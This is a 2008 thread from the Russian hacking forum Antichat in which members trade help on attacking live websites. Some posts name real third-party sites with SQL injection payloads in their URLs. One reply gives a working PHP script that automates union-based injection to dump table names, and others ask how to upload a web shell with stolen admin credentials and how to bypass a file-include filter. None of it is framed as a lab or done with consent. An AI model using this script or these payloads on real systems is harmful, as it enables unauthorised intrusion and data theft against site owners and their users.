ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
26.01.2008, 00:46
|
|
Познающий
Регистрация: 02.06.2006
Сообщений: 66
Провел на форуме:
870911
Репутация:
69
|
|
да, на оба
blackybr:
тогда напрямую обойти не получится.
естественно я этого не утверждаю, т.к. не знаю что там за код.. а вслепую врядли.
|
|
|
27.01.2008, 00:26
|
|
Постоянный
Регистрация: 26.12.2007
Сообщений: 353
Провел на форуме:
905389
Репутация:
332
|
|
помогите плиз с этим:
http://www.uralweb.ru/rating/index.php?rating_sel="123
|
|
|
|
27.01.2008, 00:49
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
Провел на форуме:
2030482
Репутация:
1796
|
|
Там посимвольный брут вот http://forum.antichat.ru/showpost.php?p=565034&postcount=4 тебе в руки.
__________________
Кто я?..
|
|
|
|
27.01.2008, 03:08
|
|
Новичок
Регистрация: 09.11.2007
Сообщений: 24
Провел на форуме:
60954
Репутация:
3
|
|
Скажите пожалуйста, если таблицы выводятся посредством limit, и их очень много, как можно автоматизировать процесс?
|
|
|
|
27.01.2008, 03:40
|
|
Новичок
Регистрация: 23.01.2007
Сообщений: 21
Провел на форуме:
20113
Репутация:
1
|
|
помогите ребята с скуль иньекцией.
Если ввожу адрес:
modules.php?name=News&pagenum=2'
то вылазит ошибка:
1064 : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '192.168.137.'' at line 1
1064 : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/modules.php?name=News&pagenum=2'')' at line
а если пишу всякую хрень БЕЗ ковычки, то ошибки нету... Можно ли этоим воспользоваться?
и ещё вопрос: если есть локальный инклуд, но фильтруются .. (две подряд идущие точки), то можно ли воспользоваться этим инклудом, если необходимо подняться на несколько уровней вверх? |
|
|
|
27.01.2008, 17:13
|
|
Новичок
Регистрация: 12.11.2007
Сообщений: 25
Провел на форуме:
36633
Репутация:
3
|
|
Здравствуйте! 
Подскажите, как залить шелл на сервер, если есть логин и пароль администратора DataLife Engine (апдейт конца 2007 года)?
Спасибо! |
|
|
|
27.01.2008, 18:29
|
|
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
Провел на форуме:
1050662
Репутация:
435
|
|
Может кто подскажет, видно что есть sql инжект. все подходит , но начинаю подбирать поля, и бесплоезно сколько бы не ставил там 1,2...30/* и все равно The used SELECT statements have a different number of columns, и что делать мож кто подскажет?
|
|
|
|
27.01.2008, 18:33
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
Сообщение от Derec
Скажите пожалуйста, если таблицы выводятся посредством limit, и их очень много, как можно автоматизировать процесс?
банальный дампер на пхп или перл, учти что в логах будет много какашек
скрипт:
PHP код:
<?php
set_time_limit(0);
ignore_user_abort(true);
$s=1;
$f=39913;
$fph = fopen ("result.txt", 'a+');
for ($i=$s; $i<=$f; $i++) {
$aps = file_get_contents("[твой сайт и путь до уязвимого скрипта]=-1+union+select+concat(0x3a3a3a,table_name,0x3a3a3a)+from+information_schema.tables+limit+".$i.",1/*");
$res=null;
$pattern ="/:::(.+):::/";
preg_match_all($pattern, $aps, $out);
$res=array_values(array_unique($out[0]));
fputs ($fph, $res[0]."\r\n");
sleep (5);
}
fclose ($fph);
?>
а если пишу всякую хрень БЕЗ ковычки, то ошибки нету... Можно ли этоим воспользоваться?
Писать не хрень, а запрос мб?
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
Последний раз редактировалось Constantine; 27.01.2008 в 19:42..
|
|
|
|
27.01.2008, 18:34
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
Провел на форуме:
2030482
Репутация:
1796
|
|
Сообщение от Sharingan
Может кто подскажет, видно что есть sql инжект. все подходит , но начинаю подбирать поля, и бесплоезно сколько бы не ставил там 1,2...30/* и все равно The used SELECT statements have a different number of columns, и что делать мож кто подскажет?
Попробуй перебирать с помощью ORDER BY. Почитай об этом тут http://forum.antichat.ru/thread43966.html.
А еще там может быть два запроса с разным количеством полей. В этом варианте посимвольный брут.
__________________
Кто я?..
|
|
|
|
27.01.2008, 18:43
|
|
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
Провел на форуме:
1050662
Репутация:
435
|
|
ордер бай не пашет, вроде
http://atv.worcsracing.com/tracks.php?ID=-1+union+select+1/*
посмотрите кто нить как там
|
|
|
|
|
|
|
|
Здесь присутствуют: 12 (пользователей: 0 , гостей: 12)
|
|
|
|
Похожие темы
Линейный вид
